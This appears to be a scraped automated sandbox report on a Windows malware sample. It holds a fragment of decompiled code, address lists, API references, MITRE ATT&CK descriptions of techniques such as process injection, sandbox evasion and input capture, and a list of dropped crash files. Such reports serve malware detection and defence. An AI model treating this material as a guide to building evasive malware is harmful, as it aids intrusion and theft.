											goto L18;
										} else {
											goto L16;
										}
									}
								}
							} else {
								_t41 =  *((intOrPtr*)(_t52 + 4));
								if(_t41 == 0 || _t58 != _t41) {
									goto L13;
								} else {
									L18:
									 *((intOrPtr*)( *_t70))(1);
								}
							}
							goto L21;
							L16:
							_t66 =  *((intOrPtr*)(_t66 + 0x10));
						} while (_t66 != 0);
						_t39 = _v20;
						_t66 =  *((intOrPtr*)(_t39 + 0x1c));
						L20:
						 *((intOrPtr*)(_t70 + 0x10)) = _t66;
						_t66 = _t70;
						 *((intOrPtr*)(_t39 + 0x1c)) = _t70;
					}
					L21:
					_t69 = _v20;
				} else {
					do {
						_t61 =  *((intOrPtr*)(_t64 + 8));
						if(_t61 == 0) {
							L5:
							_t62 =  *((intOrPtr*)(_t64 + 4));
							if(_t62 == 0) {
								goto L8;
							} else {
								_t48 =  *_t52;
								if(_t48 == 0) {
									goto L8;
								} else {
									_t50 = _t62 + 4;
									__imp____std_type_info_compare(_t50, _t48 + 4);
									_t74 = _t74 + 8;
									if(_t50 != 0) {
										goto L8;
									}
								}
							}
						} else {
							_t47 =  *((intOrPtr*)(_t52 + 4));
							if(_t47 == 0 || _t61 != _t47) {
								goto L5;
							}
						}
						goto L22;
						L8:
						_t64 =  *((intOrPtr*)(_t64 + 0x10));
					} while (_t64 != 0);
					goto L9;
				}
				L22:
				LeaveCriticalSection(_t69);
				 *[fs:0x0] = _v16;
				return _t66;
			}

0x00401fb3
0x00401fb5
0x00401fc0
0x00401fc1
0x00401fc7
0x00401fce
0x00401fd2
0x00401fd8
0x00401fda
0x00401fde
0x00401fe1
0x00401fe7
0x00401feb
0x00401fee
0x00401ff5
0x00401ffa
0x00402043
0x00402044
0x0040204d
0x00402057
0x0040205b
0x0040205e
0x00402061
0x00402065
0x00402068
0x0040206e
0x00402073
0x004020c2
0x00000000
0x00402075
0x00402075
0x00402075
0x0040207a
0x00402087
0x00402087
0x0040208c
0x00000000
0x0040208e
0x0040208e
0x00402092
0x00000000
0x00402094
0x00402098
0x00402098
0x0040209c
0x004020a2
0x004020a7
0x00000000
0x00000000
0x00000000
0x00000000
0x004020a7
0x00402092
0x0040207c
0x0040207c
0x00402081
0x00000000
0x004020b8
0x004020b8
0x004020be
0x004020be
0x00402081
0x00000000
0x004020a9
0x004020a9
0x004020ac
0x004020b0
0x004020b3
0x004020c5
0x004020c5
0x004020c8
0x004020ca
0x004020ca
0x004020cd
0x004020cd
0x00402000
0x00402000
0x00402000
0x00402005
0x00402016
0x00402016
0x0040201b
0x00000000
0x0040201d
0x0040201d
0x00402021
0x00000000
0x00402023
0x00402027
0x0040202b
0x00402031
0x00402036
0x00000000
0x00000000
0x00402036
0x00402021
0x00402007
0x00402007
0x0040200c
0x00000000
0x00000000
0x0040200c
0x00000000
0x0040203c
0x0040203c
0x0040203f
0x00000000
0x00402000
0x004020d0
0x004020d1
0x004020dc
0x004020ea

APIs

EnterCriticalSection.KERNEL32(?,149E0ABF), ref: 00401FE1
LeaveCriticalSection.KERNEL32(?,?,149E0ABF), ref: 00402044
EnterCriticalSection.KERNEL32(?), ref: 00402068
LeaveCriticalSection.KERNEL32(?), ref: 004020D1

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 6ab8c2f75369db81aad28d4a90cc497bd0364cfc056410e3ee7ae466f8d94065
Instruction ID: 5e27180dd2b8a94b9f7693f93694c1bb2085909a7fd351840ceac7f5650528c6
Opcode Fuzzy Hash: 6ab8c2f75369db81aad28d4a90cc497bd0364cfc056410e3ee7ae466f8d94065
Instruction Fuzzy Hash: 01418875600705DBDB20CF55CA48BABBBB8FF44710B18852AE919A7380D7B5E900CBA9

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report xw0K5Lahxz

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_xw0K5Lahxz.exe_95aa1ac7bda4b245fee33b1ebd16a7c0b6cf9a_9d1d8c5d_023f2379\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_xw0K5Lahxz.exe_95aa1ac7bda4b245fee33b1ebd16a7c0b6cf9a_9d1d8c5d_17aefe1e\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_xw0K5Lahxz.exe_95aa1ac7bda4b245fee33b1ebd16a7c0b6cf9a_9d1d8c5d_19430a82\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_xw0K5Lahxz.exe_95aa1ac7bda4b245fee33b1ebd16a7c0b6cf9a_9d1d8c5d_1bbef16c\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1EF5.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER21B5.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER22B0.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5CF.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER88F.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER98A.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREC1D.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREF3B.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF074.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF96B.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFBFC.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFD26.tmp.xml

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Windows Analysis Report
xw0K5Lahxz

Function 00404EB0 Relevance: 24.4, APIs: 16, Instructions: 404
networkCOMMON

Function 00404CC0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 155
networkCOMMON

Function 004057A0 Relevance: 17.0, APIs: 6, Strings: 3, Instructions: 1293
COMMONCrypto

Function 007226C6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 0040B470 Relevance: .3, Instructions: 264
COMMONCrypto

Function 00412A58 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51
libraryloaderCOMMON

Function 00402FB0 Relevance: 15.1, APIs: 10, Instructions: 99
networkCOMMON

Function 00404AF0 Relevance: 13.6, APIs: 9, Instructions: 146
networkCOMMON

Function 00404860 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 195
networkCOMMON

Function 00402820 Relevance: 12.2, APIs: 8, Instructions: 246
timeCOMMON

Function 00402C60 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 104
COMMON

Function 00425F3E Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 693
memoryCOMMON

Function 00410BA0 Relevance: 4.7, APIs: 3, Instructions: 186
COMMON

Function 00411660 Relevance: 4.6, APIs: 3, Instructions: 95
networkCOMMON